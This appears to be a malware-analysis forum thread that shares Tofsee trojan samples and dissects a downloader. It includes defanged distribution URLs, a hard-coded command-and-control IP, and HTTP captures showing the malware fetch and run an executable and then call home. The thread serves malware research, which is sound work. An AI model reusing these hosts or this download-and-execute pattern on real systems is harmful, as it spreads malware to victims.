Win32/Tofsee (Trojan.SpamBot)

#16654 by Xylitol
Fri Nov 16, 2012 5:33 pm

Payload of Serenity Exploit Kit

hxxp://winampgroup.co.uk/k0ff/index.php?s=ag

https://www.virustotal.com/file/95e1139 ... /analysis/
4/44 and 22/44 on unpacked.

Attachments

Tofsee.F.zip

infected
(110.29 KiB) Downloaded 81 times

Registration Problems and FAQ - Rules For Malware Requests

Username

Xylitol

Rank

Global Moderator

Posts

1706

Joined

Sat Apr 10, 2010 5:54 pm

Location

Seireitei, Soul Society

Contact

Re: Tofsee.F

#17982 by Xylitol
Sat Feb 02, 2013 12:19 am

VT: 27/46
https://www.virustotal.com/file/477e1aa ... 359760602/

Attachments

477e1aa5adb14022ed1c7ebaa9375744f0c336aacd4e6a11d901b2133ad8a252.zip

infected
(35.59 KiB) Downloaded 50 times

Registration Problems and FAQ - Rules For Malware Requests

Username

Xylitol

Rank

Global Moderator

Posts

1706

Joined

Sat Apr 10, 2010 5:54 pm

Location

Seireitei, Soul Society

Contact

Re: Win32.Dorifel / W32/XDocCrypt.a

#18849 by Win32:Virut
Fri Apr 05, 2013 1:18 pm

Also Dorifel?

_hxxp://khwrte.best.lt.ua/dlimage4.php

https://www.virustotal.com/en/file/fa3d ... /analysis/

Attachments

YouWhoreTIFF-fb.7z

Password: infected
(25.7 KiB) Downloaded 41 times

Username

Win32:Virut

Posts

324

Joined

Sat Jun 02, 2012 2:22 pm

Re: Win32.Dorifel / W32/XDocCrypt.a

#18850 by EP_X0FF
Fri Apr 05, 2013 2:19 pm

Win32:Virut wrote:Also Dorifel?

_hxxp://khwrte.best.lt.ua/dlimage4.php

https://www.virustotal.com/en/file/fa3d ... /analysis/

This is trojan downloader. First it downloads the following picture

http://i.imgur.com/UIJ71m6.jpg

Code: Select all

GET /pics/post/funny-pictures-auto-couple-sex-469407.jpeg HTTP/1.0
Host: img7.joyreactor.com

HTTP/1.1 200 OK
Server: nginx/1.2.4
Date: Fri, 05 Apr 2013 14:06:57 GMT
Content-Type: image/jpeg
Content-Length: 84064
Connection: close
X-Powered-By: PHP/5.3.14
Cache-Control: max-age=0
Last-Modified: Sat, 23 Mar 2013 11:33:06 GMT
Expires: Fri, 05 Apr 2013 14:06:57 GMT

......JFIF

Next it call ShellExecute to display this picture. Meanwhile in the background it downloads real payload.

Code: Select all

POST /daol/oadl.php HTTP/1.0
Host: 94.242.250.178
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

u=man02&p=irs4Kpw0aA&l=4HTTP/1.1 200 OK
Date: Fri, 05 Apr 2013 14:10:54 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Pragma: public
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="YouWhoreJPEG.exe";
Content-Transfer-Encoding: binary
Content-Length: 110592
Connection: close
Content-Type: application/force-download

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

Uploads it to the %UserProfile% folder under random name and executes. After it drops self-deletion bat to %TEMP% folder.

This payload is Backdoor:Win32/Tofsee.F, see http://www.microsoft.com/security/porta ... 2fTofsee.F

Call home

Code: Select all

GET /daol/uiash4.dat?wv=51&bt=32 HTTP/1.0
Host: 94.242.250.178

HTTP/1.1 200 OK
Date: Fri, 05 Apr 2013 14:08:13 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 13 Mar 2013 11:46:20 GMT
ETag: "7e003-72-4d7ccf45edb00"
Accept-Ranges: bytes
Content-Length: 114
Connection: close
Content-Type: video/unknown

.6.

Original + unpacked in attach. Posts moved.